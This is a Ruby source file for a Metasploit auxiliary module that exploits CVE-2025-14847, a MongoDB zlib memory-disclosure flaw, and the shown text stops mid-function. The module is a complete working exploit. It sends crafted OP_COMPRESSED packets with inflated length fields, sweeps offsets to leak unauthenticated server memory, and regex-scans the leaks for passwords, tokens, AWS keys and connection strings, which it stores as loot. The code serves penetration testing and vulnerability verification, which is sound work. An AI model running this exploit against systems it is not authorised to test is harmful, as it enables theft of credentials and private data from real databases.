Path: blob/master/modules/auxiliary/scanner/mongodb/cve_2025_14847_mongobleed.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'MongoDB Memory Disclosure (CVE-2025-14847) - Mongobleed',
        'Description' => %q{
          This module exploits a memory disclosure vulnerability in MongoDB's zlib
          decompression handling (CVE-2025-14847). By sending crafted OP_COMPRESSED
          messages with inflated BSON document lengths, the server reads beyond the
          decompressed buffer and returns leaked memory contents in error messages.

          The vulnerability allows unauthenticated remote attackers to leak server
          memory which may contain sensitive information such as credentials, session
          tokens, encryption keys, or other application data.
        },
        'Author' => [
          'Alexander Hagenah', # Metasploit module (x.com/xaitax)
          'Diego Ledda', # Co-author & review (x.com/jbx81)
          'Joe Desimone' # Original discovery and PoC (x.com/dez_)
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2025-14847'],
          ['URL', 'https://www.wiz.io/blog/mongobleed-cve-2025-14847-exploited-in-the-wild-mongodb'],
          ['URL', 'https://jira.mongodb.org/browse/SERVER-115508'],
          ['URL', 'https://x.com/dez_']
        ],
        'DisclosureDate' => '2025-12-19',
        'DefaultOptions' => {
          'RPORT' => 27017
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [IOC_IN_LOGS],
          'Reliability' => [REPEATABLE_SESSION]
        },
        'Actions' => [
          ['SCAN', { 'Description' => 'Scan and exploit memory leak vulnerability' }],
          ['CHECK', { 'Description' => 'Quick vulnerability check using Wiz magic packet' }]
        ],
        'DefaultAction' => 'SCAN'
      )
    )

    register_options(
      [
        Opt::RPORT(27017),
        OptInt.new('MIN_OFFSET', [true, 'Minimum BSON document length offset', 20]),
        OptInt.new('MAX_OFFSET', [true, 'Maximum BSON document length offset', 8192]),
        OptInt.new('STEP_SIZE', [true, 'Offset increment (higher = faster, less thorough)', 1]),
        OptInt.new('BUFFER_PADDING', [true, 'Padding added to buffer size claim', 500]),
        OptInt.new('LEAK_THRESHOLD', [true, 'Minimum bytes to report as interesting leak', 10]),
        OptBool.new('QUICK_SCAN', [true, 'Quick scan mode - sample key offsets only', false]),
        OptInt.new('REPEAT', [true, 'Number of scan passes (more passes = more data)', 1]),
        OptBool.new('REUSE_CONNECTION', [true, 'Reuse TCP connection for faster scanning', true])
      ]
    )

    register_advanced_options(
      [
        OptBool.new('SHOW_ALL_LEAKS', [true, 'Show all leaked fragments, not just large ones', false]),
        OptBool.new('SHOW_HEX', [true, 'Show hexdump of leaked data', false]),
        OptString.new('SECRETS_PATTERN', [true, 'Regex pattern to detect sensitive data', 'password|secret|key|token|admin|AKIA|Bearer|mongodb://|mongo:|conn|auth']),
        OptBool.new('FORCE_EXPLOIT', [true, 'Attempt exploitation even if version check indicates not vulnerable', false]),
        OptInt.new('PROGRESS_INTERVAL', [true, 'Show progress every N offsets (0 to disable)', 500]),
        OptBool.new('SAVE_RAW_RESPONSES', [true, 'Save all raw responses for offline analysis', false]),
        OptBool.new('SAVE_JSON', [true, 'Save leaked data as JSON with metadata', true])
      ]
    )
  end

  # MongoDB Wire Protocol constants
  OP_QUERY = 2004 # Legacy query opcode
  OP_REPLY = 1 # Legacy reply opcode
  OP_COMPRESSED = 2012
  OP_MSG = 2013
  COMPRESSOR_ZLIB = 2
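
  # For reference (per the public MongoDB wire protocol documentation), every message
  # starts with a 16-byte header of four little-endian int32 fields:
  #   messageLength | requestID | responseTo | opCode
  # An OP_COMPRESSED body then carries: originalOpcode (int32), uncompressedSize (int32),
  # compressorId (uint8: 0 = noop, 1 = snappy, 2 = zlib, 3 = zstd) and the compressed bytes.
  # The probes below rely on uncompressedSize and the inner BSON length being
  # attacker-supplied claims rather than values derived from the actual data.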

  # Wiz Research "magic packet" for deterministic vulnerability detection
  # This is a crafted OP_COMPRESSED message containing {"a": 1} with inflated uncompressedSize
  WIZ_MAGIC_PACKET = [
    '2a000000', # messageLength (42)
    '01000000', # requestID
    '00000000', # responseTo
    'dc070000', # opCode (OP_COMPRESSED = 2012)
    'dd070000', # originalOpcode (OP_MSG = 2013)
    '32000000', # uncompressedSize (50 - inflated)
    '02', # compressorId (zlib = 2)
    '789c636080028144064620050002ca0073' # zlib compressed payload
  ].join.freeze
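
  # [WIZ_MAGIC_PACKET].pack('H*') turns the hex string above into the 42-byte message
  # advertised by messageLength; the claimed uncompressedSize (50) is larger than the
  # real decompressed payload, which is the condition that makes vulnerable builds
  # read past the buffer.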

  #
  # Quick vulnerability check using Wiz Research magic packet
  #
  def run_check(ip)
    print_status("Running vulnerability check against #{ip}:#{rport}...")

    # First get version info
    version_info = get_mongodb_version
    if version_info
      version_str = version_info[:version]
      print_status("MongoDB version: #{version_str}")
      vuln_status = check_vulnerable_version(version_str)

      case vuln_status
      when :patched
        print_error("Version #{version_str} is PATCHED - not vulnerable")
        return :safe
      when :vulnerable, :vulnerable_eol
        print_good("Version #{version_str} appears vulnerable, confirming with probe...")
      when :unknown
        print_warning("Version #{version_str} - vulnerability status unknown, testing...")
      end
    else
      print_warning('Could not determine MongoDB version, testing anyway...')
    end

    # Check if zlib compression is enabled
    compressors = get_server_compressors
    if compressors
      print_status("Server compressors: #{compressors.join(', ')}")
      unless compressors.include?('zlib')
        print_error('Server does not have zlib compression enabled (required for this vulnerability)')
        return :safe
      end
    else
      print_warning('Could not determine server compression support, testing anyway...')
    end

    # Send the Wiz magic packet to confirm exploitability
    print_status('Sending Wiz magic packet to confirm vulnerability...')
    result = send_magic_packet_check
    case result
    when :vulnerable
      version_msg = version_info ? " (MongoDB #{version_info[:version]})" : ''
      print_good("VULNERABLE - Server leaks memory via CVE-2025-14847#{version_msg}")

      # Report the vulnerability
      report_vuln(
        host: ip,
        port: rport,
        proto: 'tcp',
        name: name,
        refs: references,
        info: "Confirmed vulnerable via magic packet check#{version_msg}"
      )
      return :vulnerable
    when :safe
      print_status('Server did not leak memory (may be patched or zlib disabled)')
      return :safe
    when :detected
      version_msg = version_info ? " (MongoDB #{version_info[:version]})" : ''
      print_warning("Server appears to be MongoDB#{version_msg}, but could not confirm vulnerability")
      print_status('Try running with ACTION=SCAN for full exploitation attempt')
      return :detected
    else
      print_error('Could not determine vulnerability status')
      return :unknown
    end
  end

  #
  # Send the Wiz Research magic packet and check for BSON signatures in leaked memory
  #
  def send_magic_packet_check
    connect
    packet = [WIZ_MAGIC_PACKET].pack('H*')
    sock.put(packet)

    response = recv_mongo_response
    disconnect

    return :unknown if response.nil? || response.empty?

    # Check for BSON signatures in response indicating memory leak
    # The Wiz template checks for 'BSON' in the zlib-decoded response or raw response
    leaked = false

    # Try to decompress and check
    begin
      if response.length > 25
        opcode = response[12, 4].unpack1('V')
        if opcode == OP_COMPRESSED
          raw = Zlib::Inflate.inflate(response[25..])
          leaked = true if raw&.upcase&.include?('BSON')
        end
      end
    rescue Zlib::Error
      # Decompression failed, check raw response
    end

    # Check raw response for BSON markers
    leaked = true if response.upcase.include?('BSON')

    # Also check for other leak indicators (field name errors, type errors)
    leaked = true if response =~ /field name '[^']+'/
    leaked = true if response =~ /unrecognized.*type/i

    return :vulnerable if leaked

    # If we got a valid MongoDB response but no leak, server might be patched
    if response.length >= 16
      msg_len = response.unpack1('V')
      return :safe if msg_len > 0 && msg_len <= response.length
    end

    :detected
  rescue ::Rex::ConnectionError, ::Errno::ECONNRESET
    :unknown
  rescue StandardError => e
    vprint_error("Magic packet check error: #{e.message}")
    :unknown
  ensure
    begin
      disconnect
    rescue StandardError
      nil
    end
  end

  #
  # Get server's supported compressors from hello/isMaster response
  #
  def get_server_compressors
    connect
    # Send hello command to get server capabilities
    response = send_command('admin', { 'hello' => 1, 'compression' => ['zlib', 'snappy', 'zstd'] })
    disconnect

    return nil if response.nil?

    # Parse compression field from response
    compressors = []
    if response =~ /compression.*?\[(.*?)\]/m
      compressor_list = ::Regexp.last_match(1)
      compressors << 'zlib' if compressor_list.include?('zlib')
      compressors << 'snappy' if compressor_list.include?('snappy')
      compressors << 'zstd' if compressor_list.include?('zstd')
    end

    # Also check raw bytes for compressor strings
    compressors << 'zlib' if response.include?('zlib') && !compressors.include?('zlib')

    compressors.empty? ? nil : compressors
  rescue StandardError
    nil
  ensure
    begin
      disconnect
    rescue StandardError
      nil
    end
  end
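
  # Version triage below mirrors the fix ranges encoded in check_vulnerable_version:
  # the 3.6.x, 4.0.x and 4.2.x series are end-of-life with no fix, while supported
  # branches are treated as patched from 4.4.30, 5.0.32, 6.0.27, 7.0.28, 8.0.17 and
  # 8.2.3 onwards (see SERVER-115508). Versions that do not parse cleanly fall back
  # to :unknown and the module probes the server directly.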

  def check_vulnerable_version(version_str)
    # Parse version for comparison
    version_match = version_str.match(/^(\d+\.\d+\.\d+)/)
    return :unknown unless version_match

    mongodb_version = Rex::Version.new(version_match[1])

    # Check against vulnerable version ranges per MongoDB JIRA SERVER-115508
    if mongodb_version.between?(Rex::Version.new('3.6.0'), Rex::Version.new('3.6.99')) ||
       mongodb_version.between?(Rex::Version.new('4.0.0'), Rex::Version.new('4.0.99')) ||
       mongodb_version.between?(Rex::Version.new('4.2.0'), Rex::Version.new('4.2.99'))
      return :vulnerable_eol
    elsif mongodb_version.between?(Rex::Version.new('4.4.0'), Rex::Version.new('4.4.29')) ||
          mongodb_version.between?(Rex::Version.new('5.0.0'), Rex::Version.new('5.0.31')) ||
          mongodb_version.between?(Rex::Version.new('6.0.0'), Rex::Version.new('6.0.26')) ||
          mongodb_version.between?(Rex::Version.new('7.0.0'), Rex::Version.new('7.0.27')) ||
          mongodb_version.between?(Rex::Version.new('8.0.0'), Rex::Version.new('8.0.16')) ||
          mongodb_version.between?(Rex::Version.new('8.2.0'), Rex::Version.new('8.2.2'))
      return :vulnerable
    elsif (mongodb_version >= Rex::Version.new('4.4.30') && mongodb_version < Rex::Version.new('5.0.0')) ||
          (mongodb_version >= Rex::Version.new('5.0.32') && mongodb_version < Rex::Version.new('6.0.0')) ||
          (mongodb_version >= Rex::Version.new('6.0.27') && mongodb_version < Rex::Version.new('7.0.0')) ||
          (mongodb_version >= Rex::Version.new('7.0.28') && mongodb_version < Rex::Version.new('8.0.0')) ||
          (mongodb_version >= Rex::Version.new('8.0.17') && mongodb_version < Rex::Version.new('8.2.0')) ||
          (mongodb_version >= Rex::Version.new('8.2.3'))
      return :patched
    end

    :unknown
  end

  def run_host(ip)
    case action.name
    when 'CHECK'
      run_check(ip)
    when 'SCAN'
      run_scan(ip)
    else
      print_error("Unknown action: #{action.name}")
    end
  end
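
  # Full SCAN workflow: fingerprint the server version, confirm zlib support, then
  # sweep inflated BSON length offsets and collect whatever the server echoes back
  # (see exploit_memory_leak).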

  def run_scan(ip)
    # Version detection and vulnerability check
    version_info = get_mongodb_version

    if version_info
      version_str = version_info[:version]
      print_status("MongoDB version: #{version_str}")

      vuln_status = check_vulnerable_version(version_str)
      case vuln_status
      when :vulnerable_eol
        print_good("Version #{version_str} is VULNERABLE (EOL, no fix available)")
      when :vulnerable
        print_good("Version #{version_str} is VULNERABLE to CVE-2025-14847")
      when :patched
        print_warning("Version #{version_str} appears to be PATCHED")
        unless datastore['FORCE_EXPLOIT']
          print_status('Set FORCE_EXPLOIT=true to attempt exploitation anyway')
          return
        end
        print_status('FORCE_EXPLOIT enabled, continuing...')
      when :unknown
        print_warning("Version #{version_str} - vulnerability status unknown")
        print_status('Proceeding with exploitation attempt...')
      end
    else
      print_warning('Could not determine MongoDB version')
      print_status('Proceeding with exploitation attempt...')
    end

    # Check compression support
    compressors = get_server_compressors
    if compressors
      print_status("Server compressors: #{compressors.join(', ')}")
      unless compressors.include?('zlib')
        print_error('Server does not support zlib compression - vulnerability not exploitable')
        print_status('The CVE-2025-14847 vulnerability requires zlib compression to be enabled')
        return unless datastore['FORCE_EXPLOIT']

        print_status('FORCE_EXPLOIT enabled, continuing anyway...')
      end
    else
      vprint_warning('Could not determine server compression support, proceeding...')
    end

    # Perform the memory leak exploitation
    exploit_memory_leak(ip, version_info)
  end

  def get_mongodb_version
    connect

    # Build buildInfo command using legacy OP_QUERY
    # This works without authentication on most MongoDB configurations
    response = send_command('admin', { 'buildInfo' => 1 })
    disconnect

    return nil if response.nil?

    # Parse BSON response to extract version
    parse_build_info(response)
  rescue ::Rex::ConnectionError, ::Errno::ECONNRESET => e
    vprint_error("Connection error during version check: #{e.message}")
    nil
  rescue StandardError => e
    vprint_error("Error getting MongoDB version: #{e.message}")
    nil
  ensure
    begin
      disconnect
    rescue StandardError
      nil
    end
  end

  def send_command(database, command)
    # Build BSON document for command
    bson_doc = build_bson_document(command)

    # Build OP_QUERY packet
    # flags (4 bytes) + fullCollectionName + numberToSkip (4) + numberToReturn (4) + query
    collection_name = "#{database}.$cmd\x00"

    query_body = [0].pack('V') # flags
    query_body << collection_name # fullCollectionName (null-terminated)
    query_body << [0].pack('V') # numberToSkip
    query_body << [1].pack('V') # numberToReturn
    query_body << bson_doc # query document

    # Build header
    request_id = rand(0xFFFFFFFF)
    message_length = 16 + query_body.length
    header = [message_length, request_id, 0, OP_QUERY].pack('VVVV')

    # Send and receive
    sock.put(header + query_body)

    # Read response
    response_header = sock.get_once(16, 5)
    return nil if response_header.nil? || response_header.length < 16

    msg_len, _req_id, _resp_to, opcode = response_header.unpack('VVVV')
    return nil unless opcode == OP_REPLY

    # Read rest of response
    remaining = msg_len - 16
    return nil if remaining <= 0

    response_body = sock.get_once(remaining, 5)
    return nil if response_body.nil?

    # OP_REPLY structure:
    # responseFlags (4) + cursorID (8) + startingFrom (4) + numberReturned (4) + documents
    return nil if response_body.length < 20

    response_body[20..] # Return documents portion
  end

  def build_bson_document(hash)
    doc = ''.b

    hash.each do |key, value|
      case value
      when Integer
        if value.between?(-2_147_483_648, 2_147_483_647)
          doc << "\x10" # int32 type
          doc << "#{key}\x00" # key (cstring)
          doc << [value].pack('V') # value
        else
          doc << "\x12" # int64 type
          doc << "#{key}\x00"
          doc << [value].pack('q<')
        end
      when Float
        doc << "\x01" # double type
        doc << "#{key}\x00"
        doc << [value].pack('E')
      when String
        doc << "\x02" # string type
        doc << "#{key}\x00"
        doc << [value.length + 1].pack('V') # string length (including null)
        doc << "#{value}\x00"
      when TrueClass, FalseClass
        doc << "\x08" # boolean type
        doc << "#{key}\x00"
        doc << (value ? "\x01" : "\x00")
      end
    end

    doc << "\x00" # Document terminator
    [doc.length + 4].pack('V') + doc # Prepend document length
  end
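
  # Worked example: build_bson_document({ 'buildInfo' => 1 }) produces the 20-byte
  # document 14 00 00 00 | 10 'buildInfo' 00 | 01 00 00 00 | 00 -- a little-endian
  # int32 total length, one int32 element named "buildInfo" with value 1, and the
  # trailing document terminator.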

  def parse_build_info(bson_data)
    return nil if bson_data.nil? || bson_data.length < 5

    result = {}

    # Parse BSON document
    doc_len = bson_data[0, 4].unpack1('V')
    return nil if doc_len > bson_data.length

    pos = 4
    while pos < doc_len - 1
      type = bson_data[pos].ord
      break if type == 0

      pos += 1

      # Read key (cstring)
      key_end = bson_data.index("\x00", pos)
      break if key_end.nil?

      key = bson_data[pos...key_end]
      pos = key_end + 1

      case type
      when 0x02 # String
        str_len = bson_data[pos, 4].unpack1('V')
        value = bson_data[pos + 4, str_len - 1]
        pos += 4 + str_len

        case key
        when 'version'
          result[:version] = value
        when 'gitVersion'
          result[:git_version] = value
        when 'sysInfo'
          result[:sys_info] = value
        end
      when 0x03 # Embedded document
        sub_doc_len = bson_data[pos, 4].unpack1('V')
        if key == 'buildEnvironment'
          # Could parse this for more details
        end
        pos += sub_doc_len
      when 0x10 # int32
        pos += 4
      when 0x12 # int64
        pos += 8
      when 0x01 # double
        pos += 8
      when 0x08 # boolean
        pos += 1
      when 0x04 # array
        arr_len = bson_data[pos, 4].unpack1('V')
        pos += arr_len
      else
        # Unknown type, try to continue
        break
      end
    end

    # Try alternate method if version not found (using hello/isMaster)
    result[:version] ||= try_hello_command

    result[:version] ? result : nil
  end

  def try_hello_command
    begin
      response = send_command('admin', { 'hello' => 1 })
      return nil if response.nil?

      # Look for version string in response
      if response =~ /(\d+\.\d+\.\d+)/
        return ::Regexp.last_match(1)
      end
    rescue StandardError
      nil
    end
    nil
  end
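
  # Each probe claims a different BSON document length (the "offset"), so the server's
  # parser reads a different distance past the real, decompressed data; sweeping the
  # offset range and repeating passes therefore tends to recover different adjacent
  # memory fragments on vulnerable builds.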

  def exploit_memory_leak(ip, version_info)
    all_leaked = ''.b
    unique_leaks = Set.new
    secrets_found = []
    leak_details = [] # For JSON export
    raw_responses = ''.b if datastore['SAVE_RAW_RESPONSES']

    # Determine offsets to scan
    offsets = generate_scan_offsets
    total_offsets = offsets.size
    repeat_count = datastore['REPEAT']
    reuse_conn = datastore['REUSE_CONNECTION']

    if repeat_count > 1
      print_status("Running #{repeat_count} scan passes to maximize data collection...")
    end

    print_status('Connection reuse enabled for faster scanning') if reuse_conn

    # Track overall progress
    progress_interval = datastore['PROGRESS_INTERVAL']
    @persistent_sock = nil
    connection_errors = 0
    max_conn_errors = 5

    1.upto(repeat_count) do |pass|
      if repeat_count > 1
        print_status("=== Pass #{pass}/#{repeat_count} ===")
      end

      print_status("Scanning #{total_offsets} offsets (#{datastore['MIN_OFFSET']}-#{datastore['MAX_OFFSET']}, step=#{datastore['STEP_SIZE']}#{datastore['QUICK_SCAN'] ? ', quick mode' : ''})")

      start_time = Time.now
      scanned = 0
      pass_leaks = 0

      offsets.each do |doc_len|
        # Progress reporting
        scanned += 1
        if progress_interval > 0 && (scanned % progress_interval == 0)
          elapsed = Time.now - start_time
          rate = scanned / elapsed
          remaining = ((total_offsets - scanned) / rate).round
          print_status("Progress: #{scanned}/#{total_offsets} (#{(scanned * 100.0 / total_offsets).round(1)}%) - #{unique_leaks.size} leaks found - ETA: #{remaining}s")
        end

        found_leak = probe_and_extract(doc_len, {
          reuse_conn: reuse_conn,
          unique_leaks: unique_leaks,
          all_leaked: all_leaked,
          secrets_found: secrets_found,
          leak_details: leak_details,
          raw_responses: raw_responses
        })

        if found_leak
          pass_leaks += 1
        end

        connection_errors = 0 # Reset on success
      rescue ::Rex::ConnectionError, ::Errno::ECONNRESET => e
        connection_errors += 1
        close_persistent_connection
        vprint_error("Connection error at offset #{doc_len}: #{e.message}")
        if connection_errors >= max_conn_errors
          print_error("Too many connection errors (#{max_conn_errors}), aborting scan")
          break
        end
        next
      rescue ::Timeout::Error
        close_persistent_connection
        vprint_error("Timeout at offset #{doc_len}")
        next
      end

      # Pass summary
      if repeat_count > 1
        print_status("Pass #{pass} complete: #{pass_leaks} new leaks (#{unique_leaks.size} total unique)")
      end
    end

    # Clean up persistent connection
    close_persistent_connection

    # Overall summary and loot storage
    if !all_leaked.empty?
      # Report found secrets first
      if secrets_found.any?
        print_line
        print_warning('Potential secrets detected:')
        secrets_found.uniq.each do |secret|
          print_warning(" - #{secret}")
        end
      end

      print_line
      print_good("Total leaked: #{all_leaked.length} bytes")
      print_good("Unique fragments: #{unique_leaks.size}")

      # Store leaked data as loot
      loot_info = 'MongoDB Memory Disclosure (CVE-2025-14847)'
      loot_info += " - Version: #{version_info[:version]}" if version_info&.dig(:version)

      path = store_loot(
        'mongodb.memory_leak',
        'application/octet-stream',
        ip,
        all_leaked,
        'mongobleed.bin',
        loot_info
      )
      print_good("Leaked data saved to: #{path}")

      # Save as JSON with metadata
      if datastore['SAVE_JSON'] && leak_details.any?
        json_data = generate_json_report(ip, version_info, leak_details, secrets_found)
        json_path = store_loot(
          'mongodb.memory_leak.json',
          'application/json',
          ip,
          json_data,
          'mongobleed.json',
          'MongoDB memory leak data with metadata'
        )
        print_good("JSON report saved to: #{json_path}")
      end

      # Save raw responses if enabled
      if datastore['SAVE_RAW_RESPONSES'] && !raw_responses.empty?
        raw_path = store_loot(
          'mongodb.memory_leak.raw',
          'application/octet-stream',
          ip,
          raw_responses,
          'mongobleed_raw.bin',
          'Raw MongoDB responses for offline analysis'
        )
        print_good("Raw responses saved to: #{raw_path}")
      end

      # Report the vulnerability
      vuln_info = "Leaked #{all_leaked.length} bytes of server memory"
      vuln_info += " (MongoDB #{version_info[:version]})" if version_info&.dig(:version)

      report_vuln(
        host: ip,
        port: rport,
        proto: 'tcp',
        name: name,
        refs: references,
        info: vuln_info
      )
    else
      print_status("No data leaked from #{ip}:#{rport}")
    end
  end
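
  # NOTE: probe_and_extract mutates the collections handed to it via opts
  # (unique_leaks, all_leaked, leak_details, secrets_found, raw_responses) and
  # returns true only when a previously unseen fragment was recorded.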

  #
  # Probe a single offset and extract leaks
  #
  def probe_and_extract(doc_len, opts = {})
    response = send_probe(doc_len, doc_len + datastore['BUFFER_PADDING'], reuse_connection: opts[:reuse_conn])
    return false if response.nil? || response.empty?

    # Save raw response if enabled
    opts[:raw_responses] << response if datastore['SAVE_RAW_RESPONSES'] && opts[:raw_responses]

    leaks = extract_leaks(response)
    found_new_leak = false

    leaks.each do |data|
      next if opts[:unique_leaks].include?(data)

      opts[:unique_leaks].add(data)
      opts[:all_leaked] << data
      found_new_leak = true

      # Store leak details for JSON export
      opts[:leak_details] << {
        offset: doc_len,
        length: data.length,
        data: data,
        printable: data.gsub(/[^[:print:]]/, '.'),
        timestamp: Time.now.utc.iso8601,
        has_secret: check_secrets(data, doc_len, opts[:secrets_found])
      }

      # Report large leaks or all if configured
      next unless data.length > datastore['LEAK_THRESHOLD'] || datastore['SHOW_ALL_LEAKS']

      preview = data.gsub(/[^[:print:]]/, '.')[0, 80]
      print_good("offset=#{doc_len.to_s.ljust(4)} len=#{data.length.to_s.ljust(4)}: #{preview}")

      # Show hex dump if enabled
      if datastore['SHOW_HEX'] && !data.empty?
        print_hexdump(data)
      end
    end

    found_new_leak
  end

  #
  # Generate JSON report with all leak data and metadata
  #
  def generate_json_report(ip, version_info, leak_details, secrets_found)
    report = {
      scan_info: {
        target: ip,
        port: rport,
        mongodb_version: version_info&.dig(:version),
        scan_time: Time.now.utc.iso8601,
        cve: 'CVE-2025-14847'
      },
      scan_parameters: {
        min_offset: datastore['MIN_OFFSET'],
        max_offset: datastore['MAX_OFFSET'],
        step_size: datastore['STEP_SIZE'],
        quick_scan: datastore['QUICK_SCAN'],
        repeat_passes: datastore['REPEAT']
      },
      summary: {
        total_leaks: leak_details.size,
        total_bytes: leak_details.sum { |l| l[:length] },
        secrets_found: secrets_found.size,
        unique_offsets: leak_details.map { |l| l[:offset] }.uniq.size
      },
      secrets: secrets_found.uniq,
      leaks: leak_details.map do |leak|
        {
          offset: leak[:offset],
          length: leak[:length],
          data_base64: Rex::Text.encode_base64(leak[:data]),
          data_printable: leak[:printable][0, 200],
          has_secret: leak[:has_secret],
          timestamp: leak[:timestamp]
        }
      end
    }

    JSON.pretty_generate(report)
  end

  #
  # Send probe with optional connection reuse
  #
  def send_probe(doc_len, buffer_size, reuse_connection: true)
    packet = build_probe_packet(doc_len, buffer_size)

    if reuse_connection
      # Use persistent connection for speed
      begin
        ensure_persistent_connection
        @persistent_sock.put(packet)
        recv_mongo_response_from(@persistent_sock)
      rescue StandardError
        # Connection failed, try fresh connection
        close_persistent_connection
        send_probe_fresh(packet)
      end
    else
      send_probe_fresh(packet)
    end
  end

  def build_probe_packet(doc_len, buffer_size)
    # Build minimal BSON content - we lie about total length to trigger the bug
    # int32 field "a" with value 1
    bson_content = "\x10a\x00\x01\x00\x00\x00".b
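
    # For comparison, a well-formed {"a" => 1} document would be 12 bytes:
    # \x0c\x00\x00\x00 <element above> \x00 (length prefix plus trailing terminator).
    # The probe instead prepends the attacker-chosen doc_len and omits the terminator,
    # so the server's BSON reader keeps walking past the end of the decompressed data.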

    # BSON document with inflated length (this is the key to the exploit)
    bson = [doc_len].pack('V') + bson_content

    # Wrap in OP_MSG structure
    # flags (4 bytes) + section kind (1 byte) + BSON
    op_msg = [0].pack('V') + "\x00".b + bson

    # Compress the OP_MSG payload
    compressed_data = Zlib::Deflate.deflate(op_msg)

    # Build OP_COMPRESSED payload
    # originalOpcode (4 bytes) + uncompressedSize (4 bytes) + compressorId (1 byte) + compressedData
    payload = [OP_MSG].pack('V')
    payload << [buffer_size].pack('V') # Claimed uncompressed size (inflated)
    payload << [COMPRESSOR_ZLIB].pack('C')
    payload << compressed_data

    # MongoDB wire protocol header
    # messageLength (4 bytes) + requestID (4 bytes) + responseTo (4 bytes) + opCode (4 bytes)
    message_length = 16 + payload.length
    header = [message_length, rand(0xFFFFFFFF), 0, OP_COMPRESSED].pack('VVVV')

    header + payload
  end

  def ensure_persistent_connection
    return if @persistent_sock && !@persistent_sock.closed?

    connect
    @persistent_sock = sock
  end

  def close_persistent_connection
    return unless @persistent_sock

    begin
      @persistent_sock.close unless @persistent_sock.closed?
    rescue StandardError
      nil
    end
    @persistent_sock = nil
  end

  def send_probe_fresh(packet)
    response = nil
    begin
      connect
      sock.put(packet)
      response = recv_mongo_response
    ensure
      begin
        disconnect
      rescue StandardError
        nil
      end
    end
    response
  end

  def recv_mongo_response
    recv_mongo_response_from(sock)
  end

  def recv_mongo_response_from(socket)
    # Read header first (16 bytes minimum)
    header = socket.get_once(16, 2)
    return nil if header.nil? || header.length < 4

    msg_len = header.unpack1('V')
    return header if msg_len <= 16

    # Read remaining data
    remaining = msg_len - header.length
    if remaining > 0
      data = socket.get_once(remaining, 2)
      return header if data.nil?

      header + data
    else
      header
    end
  rescue ::Timeout::Error, ::EOFError
    nil
  end
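
  # Leaked bytes typically surface inside the server's error strings (bad field names,
  # unknown BSON type codes, stray quoted values), so extraction below is regex-driven
  # over both the decompressed and the raw reply.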

  #
  # Extract leaks with additional patterns (raw bytes, BSON markers, strings)
  #
  def extract_leaks(response)
    return [] if response.nil? || response.length < 25

    leaks = []

    begin
      msg_len = response.unpack1('V')
      return [] if msg_len > response.length

      # Check if response is compressed (opcode at offset 12)
      opcode = response[12, 4].unpack1('V')

      raw = nil
      if opcode == OP_COMPRESSED
        # Decompress: skip header (16) + originalOpcode (4) + uncompressedSize (4) + compressorId (1) = 25 bytes
        begin
          raw = Zlib::Inflate.inflate(response[25, msg_len - 25])
        rescue Zlib::Error
          # Try without decompression
          raw = response[25, msg_len - 25]
        end
      else
        # Uncompressed OP_MSG - skip header
        raw = response[16, msg_len - 16]
      end

      return [] if raw.nil?

      # Extract field names from BSON parsing errors
      raw.scan(/field name '([^']*)'/) do |match|
        data = match[0]
        next if data.nil? || data.empty?
        next if ['?', 'a', '$db', 'ping', 'ok', 'errmsg', 'code', 'codeName'].include?(data)

        leaks << data
      end

      # Extract type bytes from unrecognized BSON type errors
      raw.scan(/(?:unrecognized|unknown|invalid)\s+(?:BSON\s+)?type[:\s]+(\d+)/i) do |match|
        type_byte = match[0].to_i & 0xFF
        leaks << type_byte.chr if type_byte > 0
      end

      # Extract any quoted strings from error messages (broader pattern)
      raw.scan(/'([^']{4,})'/) do |match|
        data = match[0]
        next if data.nil? || data.empty?
        next if data.length < 4 # Skip very short strings
        next if data =~ /^\$?[a-z]+$/i && data.length < 8 # Skip simple field names

        leaks << data
      end

      # Extract printable ASCII sequences from raw bytes (minimum 6 chars)
      raw.scan(/[\x20-\x7E]{6,}/) do |match|
        next if match.nil? || match.empty?
        # Filter out common MongoDB response strings
        next if match =~ /^(errmsg|codeName|ok|code|\$db|admin)$/
        next if leaks.include?(match)

        leaks << match
      end

      # Look for MongoDB connection strings
      raw.scan(%r{mongodb(?:\+srv)?://[^\s"'<>]+}) do |match|
        leaks << match unless leaks.include?(match)
      end

      # Look for potential JSON/BSON fragments
      raw.scan(/\{[^{}]{5,100}\}/) do |match|
        next if match.nil? || match.empty?
        next if match =~ /^\{\s*\}$/ # Skip empty objects

        leaks << match unless leaks.include?(match)
      end
    rescue Zlib::Error => e
      vprint_error("Decompression error: #{e.message}")
    rescue StandardError => e
      vprint_error("Error extracting leaks: #{e.message}")
    end

    leaks.uniq
  end

  def check_secrets(data, offset, secrets_found)
    pattern = Regexp.new(datastore['SECRETS_PATTERN'], Regexp::IGNORECASE)
    return false unless data =~ pattern

    match = ::Regexp.last_match[0]
    match_pos = ::Regexp.last_match.begin(0)

    # Extract context around the match (20 chars before and after)
    context_start = [match_pos - 20, 0].max
    context_end = [match_pos + match.length + 20, data.length].min
    context = data[context_start...context_end].gsub(/[^[:print:]]/, '.')

    # Highlight position in context
    secret_info = "Pattern '#{match}' at offset #{offset}"
    secret_info += " (pos #{match_pos}): ...#{context}..."

    secrets_found << secret_info
    print_warning("Secret pattern detected at offset #{offset}: '#{match}' in context: ...#{context}...")
    true
  end

  def generate_scan_offsets
    min_off = datastore['MIN_OFFSET']
    max_off = datastore['MAX_OFFSET']
    step = datastore['STEP_SIZE']

    if datastore['QUICK_SCAN']
      # Quick scan mode: sample key offsets that typically yield results
      # Based on common BSON document sizes and memory alignment
      quick_offsets = []

      # Small offsets (header area)
      quick_offsets += (20..100).step(5).to_a

      # Power of 2 boundaries (common allocation sizes)
      [128, 256, 512, 1024, 2048, 4096, 8192].each do |boundary|
        next if boundary < min_off || boundary > max_off

        # Sample around boundaries
        (-10..10).step(2).each do |delta|
          off = boundary + delta
          quick_offsets << off if off >= min_off && off <= max_off
        end
      end

      # Sample every 128 bytes for broader coverage
      quick_offsets += (min_off..max_off).step(128).to_a

      quick_offsets.uniq.sort.select { |o| o >= min_off && o <= max_off }
    else
      # Normal scan with step size
      (min_off..max_off).step(step).to_a
    end
  end

  def print_hexdump(data)
    return if data.nil? || data.empty?

    # Print hexdump in classic format (16 bytes per line)
    offset = 0
    data.bytes.each_slice(16) do |chunk|
      hex_part = chunk.map { |b| '%02x' % b }.join(' ')
